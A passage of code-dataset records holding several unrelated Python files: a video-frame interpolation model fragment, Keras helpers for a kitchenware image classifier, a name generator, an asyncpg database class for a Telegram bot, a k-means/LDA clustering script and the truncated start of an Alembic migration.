x, encoding, return_velocity=False):\n x_t2b, x_b2t = x[:, 0], x[:, 1]\n x = torch.cat((x_t2b, x_b2t), dim=1)\n if return_velocity:\n flow, flows, velocity = self.flow_net(x, encoding, return_velocity)\n else:\n flow, flows = self.flow_net(x, encoding) ## h/2,w/2\n flow_t2b, flow_b2t = torch.chunk(flow, chunks=2, dim=1)\n c_t2b = self.warped_context_net(x_t2b, flow_t2b)\n c_b2t = self.warped_context_net(x_b2t, flow_b2t)\n flow_t2b = F.interpolate(flow_t2b, scale_factor=2.0, mode=\"bilinear\", align_corners=False) * 2.0 # h,w\n flow_b2t = F.interpolate(flow_b2t, scale_factor=2.0, mode=\"bilinear\", align_corners=False) * 2.0\n out = self.ife_net(x_t2b, x_b2t, flow_t2b, flow_b2t, c_t2b, c_b2t)\n\n if return_velocity:\n return out, flows, velocity\n return out, flows\n\n\n\ndef cost_profile(model, H, W, seq_length, ext_frames):\n x = torch.randn(1, 6 * seq_length, H, W).cuda()\n x = pad(x)\n encodings = torch.randn(1, 2 * ext_frames, H, W).cuda()\n encodings = pad(encodings)\n flops, params = profile(model, inputs=(x, encodings), verbose=False)\n\n return flops, params\n\n#\n# if __name__ == '__main__':\n# from para import Parameter\n#\n# args = Parameter().args\n# inputs = torch.randn(4, 18, 256, 256).cuda()\n# encodings = torch.randn(4, 6, 256, 256).cuda()\n# model = Model(args).cuda()\n# outputs, flows = model(inputs, encodings)\n# print(outputs.shape)\n# for flow in flows:\n# print(flow.shape)\n\n","repo_name":"shangwei5/SelfDRSC","sub_path":"models/network_srsc_rsg.py","file_name":"network_srsc_rsg.py","file_ext":"py","file_size_in_byte":14350,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"72821671433","text":"import json\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\nimport pandas as pd\nimport PIL\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.callbacks import History\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, load_img\n\n\ndef plot_thumbnails(image_paths: list[str], n_cols: int = 10) -> None:\n \"\"\"\n Plots squared thumbnails in a grid.\n \n :param list[str] image_paths: Paths to the images. All images are plotted.\n :param int n_cols: Number of columns in preview (optional)\n \"\"\"\n\n # prevent numbers smaller than one\n n_cols = max(1, n_cols)\n n: int = len(image_paths)\n n_rows = n // n_cols\n\n fig = plt.figure(figsize=(n_cols*2, n_rows*2))\n fig.patch.set_alpha(0.0)\n\n for i in range(n):\n im = PIL.Image.open(image_paths[i])\n #im = square_img(im)\n ax = plt.subplot(n_rows, n_cols, i+1)\n plt.imshow(im)\n ax.spines['bottom'].set_color('grey')\n ax.spines['top'].set_color('grey') \n ax.spines['right'].set_color('grey')\n ax.spines['left'].set_color('grey')\n\n # remove the x and y ticks\n plt.setp(plt.gcf().get_axes(), xticks=[], yticks=[])\n\n # set the spacing between subplots\n plt.subplots_adjust(\n wspace=0.1,\n hspace=0.1\n )\n\n # save image\n plt.show()\n\n\ndef plot_thumbnails_for_label(df: pd.DataFrame, label: str, n: int = 30, n_cols: int = 10) -> None:\n \"\"\"\n Plots squared thumbnails in a grid.\n \n :param pd.DataFrame df: Dataframe with columns \"label\" and \"filename\"\n :param str label: Label, for which images should be plotted\n :param int n_cols: Number of images in preview (optional)\n :param int n_cols: Number of columns in preview (optional)\n \"\"\"\n\n image_paths: list[str] = df.loc[df['label'] == label, 'filename'].iloc[:n].tolist()\n\n plot_thumbnails(\n image_paths=image_paths, \n n_cols=n_cols\n )\n\n\ndef square_img(im: PIL.Image) -> PIL.Image:\n \"\"\"\n Square image by retaining shorter dimension and \n crop on longer dimension centered.\n \n :param PIL.Image im: A image object\n \"\"\"\n\n # get x and y dimensions of image size in pixels\n img_size: tuple[int, int] = im.size\n x, y = img_size\n\n # calculate offset for squared crop\n size: int = min(x, y)\n x_offset: int = round((x - size) / 2)\n y_offset: int = round((y - size) / 2)\n\n # crop and return image\n return im.crop(box=(x_offset, y_offset, x-x_offset, y-y_offset))\n\n\ndef predict_test_set(model: Model, image_size: tuple[int], labels: list[str], path: str = 'data/test.csv', evaluate: bool = False) -> pd.DataFrame:\n \"\"\"Use model to predict on test data set.\n \n :param keras.Model model: A trained keras model object.\n :param tuple[int] image_size: Tuple with height and width of images, the data was trained on.\n :param list[str] labels: List with labels in the order, the model was trained on.\n :param str path: Path to the DataFrame with the test data.\n :param bool evaluate: (optional) If True model will only predict on data, for which a label exists in the test data. \n Default is False and prediction will be performed on the full test dataset. \n\n Returns a DataFrame with the prediction for each test image.\n \"\"\"\n\n # load csv with test data\n df_test = pd.read_csv(path, dtype={'Id': str})\n df_test['filename'] = 'data/images/' + df_test['Id'] + '.jpg'\n\n # load only labeled test data in evaluation mode\n # but for submission all test observations need to be predicted\n if evaluate and 'label' in df_test.columns:\n df_test = df_test[~df_test['label'].isna()]\n \n # create data generator\n test_datagen = ImageDataGenerator()\n test_generator = test_datagen.flow_from_dataframe(\n df_test,\n x_col='filename',\n class_mode='input',\n target_size=image_size,\n batch_size=32,\n shuffle=False\n )\n\n # predict\n y_pred = model.predict(test_generator)\n\n classes = np.array(labels)\n predictions = classes[y_pred.argmax(axis=1)]\n\n df_test['pred'] = predictions\n\n if evaluate:\n df_test['correct'] = df_test['pred'] == df_test['label']\n print(f\"Prediction accuracy: {df_test['correct'].mean()*100:.2f}%.\")\n\n return df_test\n\n\ndef print_false_preds(df_test: pd.DataFrame) -> None:\n \"\"\"Plots the first twelve falsely predicted images with predicted and actual label.\n \n :param pd.DataFrame df_test: A DataFrame with predictions.\n \"\"\"\n\n plt.figure(figsize=(10,7))\n\n for idx, row in df_test[~df_test['correct']].sample(frac=1).reset_index(drop=True)[:12].iterrows():\n im = PIL.Image.open(row['filename'])\n plt.subplot(3, 4, idx+1)\n plt.imshow(im)\n plt.axis('off')\n plt.title(f\"{row['Id']} - {row['pred']}/{row['label']}\")\n plt.show()\n\n\ndef prepare_kaggle_submission(df_test: pd.DataFrame) -> None:\n \"\"\"Saves a submission.csv file for Kaggle from the Dataframe with predictions.\n \n :param pd.DataFrame df_test: A DataFrame with predictions.\n \"\"\"\n\n if df_test.shape[0] != 3808:\n print(f\"Warning: Dataset with 3808 rows expected, but got {df_test.shape[0]} rows instead.\")\n\n df_submission = df_test.drop(['label'], axis='columns').rename(columns={'pred': 'label'})\n df_submission[['Id', 'label']].to_csv('submission.csv', index=False)\n\n\ndef track_experiment(keras_history: History, architecture: str, version: int, hyper_params: dict, labels: list[str], start_epoch: int=1) -> pd.DataFrame:\n \"\"\"Saves training performance in a central csv file.\n \n :param keras.callbacks.History keras_history: A keras history object.\n :param str architecture: Name of the used model architecture for labeling the training.\n :param int version: A number for the training.\n :param dict hyper_params: Used hyper parameters for the training.\n :param list[str] labels: List with labels in the order, the model was trained for.\n :param int start_epoch: Epoch, when the history was started. Default is 1, could be changed when training was resumed.\n\n Returns a DataFrame with all input data.\n \"\"\"\n\n df_history = pd.DataFrame(keras_history.history)\n df_history['architecture'] = architecture\n df_history['epoch'] = list(range(start_epoch, len(keras_history.history['loss']) + start_epoch))\n df_history['version'] = version\n df_history['params'] = json.dumps(hyper_params)\n df_history['labels'] = json.dumps(labels)\n df_history['timestamp'] = datetime.now()\n\n save_history(df_history)\n\n return df_history\n\n\ndef save_history(df: pd.DataFrame, path: str='models/train_history.csv') -> None:\n \"\"\"Appends training history to a central csv file.\n \n :param pd.DataFrame df: A DataFrame, which will be appended to the central csv file.\n :param str path: Location of the central csv file. (optional)\n \"\"\"\n\n with open(path, mode='a', newline='') as f:\n df.to_csv(f, mode='a', header=f.tell()==0, index=False)\n\n\ndef load_history(path: str='models/train_history.csv') -> pd.DataFrame:\n \"\"\"Loads all tracked training histories from a central csv file.\n \n :param str path: Location of the central csv file. (optional)\n\n Returns a DataFrame with all training histories which were tracked.\n \"\"\"\n\n return pd.read_csv(path)\n\n\ndef load_history_version(version: int) -> pd.DataFrame:\n \"\"\"Loads the tracked training history for a specific training session from a central csv file.\n \n :param int version: Number of the training session.\n\n Returns a DataFrame with the full training history for the specified session.\n \"\"\"\n\n df = load_history()\n\n # filter for specific version in history\n df = df[df['version'] == version]\n\n return df\n\n\ndef get_params_for_version(version: int) -> dict:\n \"\"\"Gets the used training parameters for a specific training session.\n \n :param int version: Number of the training session.\n\n Returns a dictionary with the used training parameters for the specified session.\n \"\"\"\n\n df = load_history_version(version=version)\n params = df['params'].iloc[0]\n return json.loads(params)\n\n\ndef get_labels_for_version(version: int) -> list[str]:\n \"\"\"Gets the used labels for a specific training session.\n \n :param int version: Number of the training session.\n\n Returns a list with the used labels for the specified training session.\n \"\"\"\n\n df = load_history_version(version=version)\n labels = df['labels'].iloc[0]\n return json.loads(labels)\n\n\ndef get_latest_version() -> int:\n \"\"\"Returns highest version number from the central csv file with tracked training histories.\n\n Returns a integer with the number. Returns if none was found.0\n \"\"\"\n\n try: \n return load_history()['version'].max()\n\n except Exception as err:\n return 0\n\n\ndef plot_accuracy_for_training_history(df: pd.DataFrame) -> None:\n \"\"\"Plots training and validation accuracy per epoch.\n \n :param pd.DataFrame df: History of the training cycle.\n \"\"\"\n\n #df = df.reset_index()\n\n fig = plt.figure(figsize=(10, 3))\n ax = plt.axes()\n\n plt.plot(df['epoch'], df['accuracy'], label='training')\n plt.plot(df['epoch'], df['val_accuracy'], label='validation')\n\n plt.xlabel('epochs')\n ax.xaxis.set_major_locator(MultipleLocator(5))\n ax.xaxis.set_major_formatter('{x:.0f}')\n ax.xaxis.set_minor_locator(MultipleLocator(1))\n\n plt.ylabel('accuracy')\n\n plt.title(f\"Training: {df['version'].iloc[0]:d} - Architecture: {df['architecture'].iloc[0]:s}\")\n\n plt.legend()\n \n plt.show()\n\n\ndef plot_accuracy_for_version(version: int) -> None:\n \"\"\"Plots training and validation accuracy per epoch.\n \n :param int version: Version number of the training cycle.\n \"\"\"\n\n df = load_history_version(version=version)\n\n plot_accuracy_for_training_history(df)\n\n\ndef plot_multiple_versions(versions: list[int], titles: list[str] = None, y_lim: tuple[float] = None) -> None:\n \"\"\"Plots training and validation accuracy for multiple versions.\n \n :param list[int] versions: List of version numbers for training cycles.\n \"\"\"\n\n df = load_history()\n\n fig, ax = plt.subplots(1, len(versions), sharex='col', sharey='row', figsize=(10, 5))\n\n if titles is None or len(versions) != len(titles):\n titles = [None] * len(versions)\n\n for idx, (version, title) in enumerate(zip(versions, titles)):\n\n df_v = df[df['version'] == version]\n\n ax[idx].plot(df_v['epoch'], df_v['accuracy'], label=('training'))\n ax[idx].plot(df_v['epoch'], df_v['val_accuracy'], label=('validation'))\n ax[idx].set_title(f\"Training: {version:d} {chr(10) + str(title) if title is not None else ''}\")\n\n if y_lim is not None:\n ax[idx].set_ylim(y_lim)\n\n plt.legend()\n plt.tight_layout()\n plt.show()","repo_name":"LoHertel/lost-in-cupboard","sub_path":"src/kitchenware_helper.py","file_name":"kitchenware_helper.py","file_ext":"py","file_size_in_byte":10922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73479718791","text":"import random\ndef allNames():\n names_list = []\n with open(\"names.txt\", encoding=\"utf-8\") as file:\n for i in file:\n names_list.append(i[:3])\n return names_list\n\nprint(\"===========取名字系統=========\\n\\n\")\n\nwhile True:\n names_list = allNames()\n first_name = input(\"請輸入你的姓:\")\n count = int(input(\"請輸入你要的筆數:\"))\n random_names = random.choices(names_list, k= count) #隨機抓5個\n for i in random_names:\n print(first_name + i[-2:])\n\n again = input(\"你還要繼續嗎? (y , n)\")\n if again.lower() == \"n\":\n break\n\nprint(\"系統結束\")\n","repo_name":"Lainie888/2023_07_27","sub_path":"lesson10_2.py","file_name":"lesson10_2.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"921739798","text":"from typing import Union\n\nimport asyncpg\nfrom asyncpg import Connection\nfrom asyncpg.pool import Pool\n\nfrom data import config\n\n\nclass Database:\n\n def __init__(self):\n self.pool: Union[Pool, None] = None\n\n async def create(self):\n self.pool = await asyncpg.create_pool(\n user=config.DB_USER,\n password=config.DB_PASS,\n host=config.DB_HOST,\n database=config.DB_NAME\n )\n\n async def execute(self, command, *args,\n fetch: bool = False,\n fetchval: bool = False,\n fetchrow: bool = False,\n execute: bool = False\n ):\n async with self.pool.acquire() as connection:\n connection: Connection\n async with connection.transaction():\n if fetch:\n result = await connection.fetch(command, *args)\n elif fetchval:\n result = await connection.fetchval(command, *args)\n elif fetchrow:\n result = await connection.fetchrow(command, *args)\n elif execute:\n result = await connection.execute(command, *args)\n return result\n\n async def create_table_users(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Users (\n id SERIAL PRIMARY KEY,\n full_name VARCHAR(255) NOT NULL,\n username varchar(255) NULL,\n phone varchar(55),\n score INT DEFAULT 0,\n oldd INT DEFAULT 0,\n telegram_id BIGINT NOT NULL UNIQUE,\n user_args varchar(55) NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_chanel(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Channel (\n id SERIAL PRIMARY KEY,\n chanelll VARCHAR(301) NOT NULL,\n url varchar(301) NOT NULL,\n channel_name TEXT NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_admins(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS admins (\n id SERIAL PRIMARY KEY,\n telegram_id BIGINT NOT NULL UNIQUE\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_chanel_element(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS Elementt (\n id SERIAL PRIMARY KEY,\n photo TEXT NULL,\n gifts TEXT NULL,\n game_text TEXT NULL,\n shartlar TEXT NULL,\n min_salary INT DEFAULT 1,\n one_child INT DEFAULT 1,\n two_children INT DEFAULT 1,\n three_children INT DEFAULT 1,\n first_min INT DEFAULT 1,\n second_min INT DEFAULT 1,\n three_min INT DEFAULT 1,\n limit_require INT DEFAULT 5,\n winners INT DEFAULT 20,\n bot_url varchar(255)\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_buttons(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS buttons (\n id SERIAL PRIMARY KEY,\n button_name VARCHAR(301) NOT NULL\n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n async def create_table_lessons(self):\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS lessons (\n id SERIAL PRIMARY KEY,\n button_name VARCHAR(301) NOT NULL,\n type VARCHAR(301) NOT NULL,\n file_id VARCHAR(301) NULL,\n file_unique_id VARCHAR(301) NOT NULL,\n description TEXT NULL \n );\n \"\"\"\n await self.execute(sql, execute=True)\n\n @staticmethod\n def format_args(sql, parameters: dict):\n sql += \" AND \".join([\n f\"{item} = ${num}\" for num, item in enumerate(parameters.keys(),\n start=1)\n ])\n return sql, tuple(parameters.values())\n\n async def add_user(self, full_name, telegram_id, username):\n sql = \"INSERT INTO users (full_name, telegram_id, username) VALUES($1, $2, $3) returning *\"\n return await self.execute(sql, full_name, telegram_id, username, fetchrow=True)\n\n async def add_userrr(self, full_name, telegram_id, username, phone, score):\n sql = \"INSERT INTO users (full_name, telegram_id, username, phone, score) VALUES($1, $2, $3, $4, $5) returning *\"\n return await self.execute(sql, full_name, telegram_id, username, phone, score, fetchrow=True)\n\n async def add_userr(self, full_name, telegram_id, username, score):\n sql = \"INSERT INTO users (full_name, telegram_id, username, score) VALUES($1, $2, $3,$4) returning *\"\n return await self.execute(sql, full_name, telegram_id, username, score, fetchrow=True)\n\n async def add_lesson_text(self, button_name, type, file_unique_id, description):\n sql = \"INSERT INTO lessons (button_name,type,file_unique_id,description) VALUES($1,$2,$3,$4) returning *\"\n return await self.execute(sql, button_name, type, file_unique_id, description, fetchrow=True)\n\n async def add_json_file_user(self, full_name, username, phone, telegram_id, score):\n sql = \"INSERT INTO users (full_name, username, phone, telegram_id, score) VALUES($1, $2, $3,$4,$5) returning *\"\n return await self.execute(sql, full_name, username, phone, telegram_id, score, fetchrow=True)\n\n async def select_all_users(self):\n sql = \"SELECT * FROM Users\"\n return await self.execute(sql, fetch=True)\n\n async def select_user(self, **kwargs):\n sql = \"SELECT * FROM Users WHERE \"\n sql, parameters = self.format_args(sql, parameters=kwargs)\n return await self.execute(sql, *parameters, fetchrow=True)\n\n async def select_top_users(self, lim_win):\n sql = f\"SELECT * FROM Users WHERE score IS NOT NULL ORDER BY score DESC LIMIT {lim_win}\"\n return await self.execute(sql, fetch=True)\n\n async def select_top_users_list(self):\n sql = f\"SELECT * FROM Users WHERE score IS NOT NULL ORDER BY score DESC\"\n return await self.execute(sql, fetch=True)\n\n async def count_users(self):\n sql = \"SELECT COUNT(*) FROM Users\"\n return await self.execute(sql, fetchval=True)\n\n async def update_user_name(self, name, telegram_id):\n sql = \"UPDATE Users SET full_name=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, name, telegram_id, execute=True)\n\n async def update_user_username(self, username, telegram_id):\n sql = \"UPDATE Users SET username=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, username, telegram_id, execute=True)\n\n async def update_user_oldd(self, oldd, telegram_id):\n sql = \"UPDATE Users SET oldd=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, oldd, telegram_id, execute=True)\n\n async def update_user_args(self, user_args, telegram_id):\n sql = \"UPDATE Users SET user_args=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, user_args, telegram_id, execute=True)\n\n async def update_user_phone(self, phone, telegram_id):\n sql = \"UPDATE Users SET phone=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, phone, telegram_id, execute=True)\n\n async def update_user_score(self, score, telegram_id):\n sql = \"UPDATE Users SET score=$1 WHERE telegram_id=$2\"\n return await self.execute(sql, score, telegram_id, execute=True)\n\n async def update_users_all_score(self):\n sql = \"UPDATE Users SET score=0\"\n return await self.execute(sql, execute=True)\n\n async def delete_users(self, telegram_id):\n sql = \"DELETE FROM Users WHERE telegram_id=$1\"\n await self.execute(sql, telegram_id, execute=True)\n\n async def delete_admin(self, admin_id):\n sql = \"DELETE FROM admins WHERE admin_id=$1\"\n await self.execute(sql, admin_id, execute=True)\n\n async def drop_users(self):\n await self.execute(\"DROP TABLE Users\", execute=True)\n\n async def delete_channel(self, chanel):\n sql = \"DELETE FROM Channel WHERE chanelll=$1\"\n await self.execute(sql, chanel, execute=True)\n\n async def select_chanel(self):\n sql = \"SELECT * FROM Channel\"\n return await self.execute(sql, fetch=True)\n\n async def add_chanell(self, chanelll, url, channel_name):\n sql = \"INSERT INTO Channel (chanelll, url,channel_name) VALUES($1, $2,$3) returning *\"\n return await self.execute(sql, chanelll, url, channel_name, fetchrow=True)\n\n async def get_chanel(self, channel):\n sql = f\"SELECT * FROM Channel WHERE chanelll=$1\"\n return await self.execute(sql, channel, fetch=True)\n\n async def get_admins(self):\n sql = f\"SELECT * FROM admins\"\n return await self.execute(sql, fetch=True)\n\n async def drop_Chanel(self):\n await self.execute(\"DROP TABLE Channel\", execute=True)\n\n async def delete_channel(self, chanel):\n sql = \"DELETE FROM Channel WHERE chanelll=$1\"\n await self.execute(sql, chanel, execute=True)\n\n async def select_chanel(self):\n sql = \"SELECT * FROM Channel\"\n return await self.execute(sql, fetch=True)\n\n async def add_photo(self, photo):\n sql = \"INSERT INTO Elementt (photo) VALUES($1) returning *\"\n return await self.execute(sql, photo, fetchrow=True)\n\n async def add_gift(self, gift):\n sql = \"INSERT INTO Elementt (gifts) VALUES($1) returning *\"\n return await self.execute(sql, gift, fetchrow=True)\n\n async def add_shartlar(self, shartlar):\n sql = \"INSERT INTO Elementt (shartlar) VALUES($1) returning *\"\n return await self.execute(sql, shartlar, fetchrow=True)\n\n async def add_text(self, bot_url):\n sql = \"INSERT INTO Elementt (bot_url) VALUES($1) returning *\"\n return await self.execute(sql, bot_url, fetchrow=True)\n\n async def add_bot_url(self, bot_url):\n sql = \"INSERT INTO Elementt (bot_url) VALUES($1) returning *\"\n return await self.execute(sql, bot_url, fetchrow=True)\n\n async def update_photo(self, photo):\n sql = \"UPDATE Elementt SET photo=$1 WHERE id=1\"\n return await self.execute(sql, photo, execute=True)\n\n async def update_limit_score(self, limit_score):\n sql = \"UPDATE Elementt SET limit_score=$1 WHERE id=1\"\n return await self.execute(sql, limit_score, execute=True)\n\n async def update_min_salary(self, min_salary):\n sql = \"UPDATE Elementt SET min_salary=$1 WHERE id=1\"\n return await self.execute(sql, min_salary, execute=True)\n\n async def update_first_min(self, first_min):\n sql = \"UPDATE Elementt SET first_min=$1 WHERE id=1\"\n return await self.execute(sql, first_min, execute=True)\n\n async def update_second_min(self, second_min):\n sql = \"UPDATE Elementt SET second_min=$1 WHERE id=1\"\n return await self.execute(sql, second_min, execute=True)\n\n async def update_three_min(self, three_min):\n sql = \"UPDATE Elementt SET three_min=$1 WHERE id=1\"\n return await self.execute(sql, three_min, execute=True)\n\n async def update_one_child(self, one_child):\n sql = \"UPDATE Elementt SET one_child=$1 WHERE id=1\"\n return await self.execute(sql, one_child, execute=True)\n\n async def update_two_children(self, two_children):\n sql = \"UPDATE Elementt SET two_children=$1 WHERE id=1\"\n return await self.execute(sql, two_children, execute=True)\n\n async def update_three_children(self, three_children):\n sql = \"UPDATE Elementt SET three_children=$1 WHERE id=1\"\n return await self.execute(sql, three_children, execute=True)\n\n async def update_limit_require(self, limit_require):\n sql = \"UPDATE Elementt SET limit_require=$1 WHERE id=1\"\n return await self.execute(sql, limit_require, execute=True)\n\n async def winners(self, winners):\n sql = \"UPDATE Elementt SET winners=$1 WHERE id=1\"\n return await self.execute(sql, winners, execute=True)\n\n async def update_game_text(self, game_text):\n sql = \"UPDATE Elementt SET game_text=$1 WHERE id=1\"\n return await self.execute(sql, game_text, execute=True)\n\n async def bot_url(self, bot_url):\n sql = \"UPDATE Elementt SET bot_url=$1 WHERE id=1\"\n return await self.execute(sql, bot_url, execute=True)\n\n async def update_gift(self, gift):\n sql = \"UPDATE Elementt SET gifts=$1 WHERE id=1\"\n return await self.execute(sql, gift, execute=True)\n\n async def update_shartlar(self, shartlar):\n sql = \"UPDATE Elementt SET shartlar=$1 WHERE id=1\"\n return await self.execute(sql, shartlar, execute=True)\n\n async def get_elements(self):\n sql = f\"SELECT * FROM Elementt WHERE id=1\"\n return await self.execute(sql, fetch=True)\n\n async def drop_elements(self):\n await self.execute(\"DROP TABLE Elementt\", execute=True)\n\n async def drop_lessons(self):\n await self.execute(\"DROP TABLE lessons\", execute=True)\n\n ### Lessons DB Commands\n async def add_button(self, button_name):\n sql = \"INSERT INTO buttons (button_name) VALUES($1) returning *\"\n return await self.execute(sql, button_name, fetchrow=True)\n\n async def delete_button_name(self, button_name):\n sql = \"DELETE FROM buttons WHERE button_name=$1\"\n await self.execute(sql, button_name, execute=True)\n\n async def select_buttons(self):\n sql = \"SELECT * FROM buttons\"\n return await self.execute(sql, fetch=True)\n\n async def add_lesson(self, button_name, type, file_id, file_unique_id, description=None):\n sql = \"INSERT INTO lessons (button_name,type,file_id,file_unique_id,description) VALUES($1,$2,$3,$4,$5) returning *\"\n return await self.execute(sql, button_name, type, file_id, file_unique_id, description, fetchrow=True)\n\n async def delete_lesson(self, file_unique_id):\n sql = \"DELETE FROM lessons WHERE file_unique_id=$1\"\n await self.execute(sql, file_unique_id, execute=True)\n\n async def delete_related_lesson(self, button_name):\n sql = \"DELETE FROM lessons WHERE button_name=$1\"\n await self.execute(sql, button_name, execute=True)\n\n async def select_lessons(self):\n sql = \"SELECT * FROM lessons\"\n return await self.execute(sql, fetch=True)\n\n async def select_related_lessons(self, button_name):\n sql = \"SELECT * FROM lessons WHERE button_name=$1\"\n return await self.execute(sql, button_name, fetch=True)\n\n async def add_admin(self, telegram_id):\n sql = \"INSERT INTO admins (telegram_id) VALUES($1) returning *\"\n return await self.execute(sql, telegram_id, fetchrow=True)\n\n async def select_all_admins(self):\n sql = \"SELECT * FROM admins\"\n return await self.execute(sql, fetch=True)\n\n async def delete_admins(self, telegram_id):\n sql = \"DELETE FROM admins WHERE telegram_id=$1\"\n await self.execute(sql, telegram_id, execute=True)\n\n async def drop_admins(self):\n await self.execute(\"DROP TABLE admins\", execute=True)\n","repo_name":"Ilyosbek07/lawyer_bot","sub_path":"utils/db_api/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":14970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71034890311","text":"from IPython.core.interactiveshell import InteractiveShell\r\nInteractiveShell.ast_node_interactivity = \"all\"\r\nfrom nltk.cluster import KMeansClusterer, cosine_distance\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom nltk.corpus import stopwords\r\nimport json\r\nfrom numpy.random import shuffle\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport pandas as pd\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nimport numpy as np\r\nfrom sklearn import metrics\r\nimport gensim\r\nfrom gensim import corpora\r\nfrom gensim.test.utils import common_corpus, common_dictionary\r\nfrom gensim.models.ldamodel import LdaModel\r\nfrom gensim.models.coherencemodel import CoherenceModel\r\nimport matplotlib.pyplot as plt\r\n\r\ndef getGroundTruthValues(testData):\r\n testFilteredData = []\r\n for item in testData.values:\r\n data = (item[0], item[1][0])\r\n testFilteredData.append(data)\r\n return testFilteredData\r\n\r\n\r\ndef cluster_kmean(train_file, test_file):\r\n trainData = json.load(open(train_file, 'r'))\r\n # testData = json.load(open(test_file, 'r'))\r\n testData = pd.read_json(test_file, orient= None)\r\n\r\n testFilteredData = getGroundTruthValues(testData)\r\n\r\n testDataFrame = pd.DataFrame(testFilteredData, columns=['Text', 'Labels'])\r\n testDataList = testDataFrame['Text'].tolist()\r\n\r\n\r\n fullList = trainData + testDataList\r\n\r\n k = 3\r\n tfidf_vect = TfidfVectorizer(stop_words=\"english\")\r\n dtm = tfidf_vect.fit_transform(fullList)\r\n clusterer = KMeansClusterer(k, cosine_distance, repeats=20)\r\n clusters = clusterer.cluster(dtm.toarray(), assign_clusters=True)\r\n\r\n clustersPredicted = clusters[len(trainData): len(clusters)]\r\n testDataFrame['cluster'] = clustersPredicted\r\n dfa = pd.crosstab(index=testDataFrame.cluster, columns=testDataFrame.Labels)\r\n print(dfa)\r\n dfMax = dfa.idxmax(axis=1)\r\n\r\n cluster_dict = {0: dfMax[0], 1: dfMax[1], 2: dfMax[2]}\r\n\r\n predicted_target = [cluster_dict[i] for i in clustersPredicted]\r\n\r\n print(metrics.classification_report (testDataFrame[\"Labels\"], predicted_target))\r\n\r\n # Calculating top words through centroid and printing out the top words for each cluster\r\n centroids = np.array(clusterer.means())\r\n sorted_centroids = centroids.argsort()[:, ::-1]\r\n voc_lookup = tfidf_vect.get_feature_names()\r\n\r\n for i in range(k):\r\n top_words = [voc_lookup[word_index] for word_index in sorted_centroids[i, :20]]\r\n print(\"Cluster %d:\\n %s \\n\\n \" % (i, \"; \".join(top_words)))\r\n\r\ndef cluster_lda(train_file, test_file):\r\n trainData = json.load(open(train_file, 'r'))\r\n tf_vectorizer = CountVectorizer(max_df=0.90, min_df=50, stop_words='english')\r\n testData = pd.read_json(test_file, orient=None)\r\n\r\n testFilteredData = getGroundTruthValues(testData)\r\n testDataFrame = pd.DataFrame(testFilteredData, columns=['Text', 'Labels'])\r\n test_data = testDataFrame['Text'].tolist()\r\n\r\n tf = tf_vectorizer.fit_transform(trainData)\r\n test_tf = tf_vectorizer.transform(test_data)\r\n\r\n tf_feature_names = tf_vectorizer.get_feature_names()\r\n\r\n no_topics = 3\r\n\r\n lda = LatentDirichletAllocation(n_components=no_topics, max_iter=20, verbose=1,\r\n evaluate_every=1, n_jobs=1,\r\n random_state=70).fit(tf)\r\n\r\n topic_assign = lda.transform(test_tf)\r\n topicsPD = pd.DataFrame(topic_assign)\r\n dfMax = topicsPD.idxmax(axis=1)\r\n\r\n crossTab = pd.crosstab(index=dfMax, columns=testDataFrame.Labels)\r\n crossTab['max'] = crossTab.idxmax(axis=1)\r\n print(crossTab)\r\n cluster_dict={0:(crossTab['max'][0]), 1:(crossTab['max'][1]), 2:(crossTab['max'][2])}\r\n predicted_target=[cluster_dict[i] for i in dfMax]\r\n print(metrics.classification_report(testDataFrame.Labels,predicted_target))\r\n\r\n num_top_words = 20\r\n for topic_idx, topic in enumerate(lda.components_):\r\n print (\"Topic %d:\" % (topic_idx))\r\n # print out top 20 words per topic\r\n words = [(tf_feature_names[i], topic[i]) for i in topic.argsort()[::-1][0:num_top_words]]\r\n print(words)\r\n print(\"\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n train_file = 'train_text.json'\r\n test_file = 'test_text.json'\r\n cluster_kmean(train_file, test_file)\r\n cluster_lda(train_file, test_file)\r\n\r\n","repo_name":"ameythombre/Web-Mining-","sub_path":"Clustering & Topic Modeling_work sample.py","file_name":"Clustering & Topic Modeling_work sample.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37074823500","text":"\"\"\"table creations\n\nRevision ID: 9bc06e50bc90\nRevises: \nCreate Date: 2023-07-22 17:06:12.531966\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9bc06e50bc90'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('board',\n sa.Column('id_id', 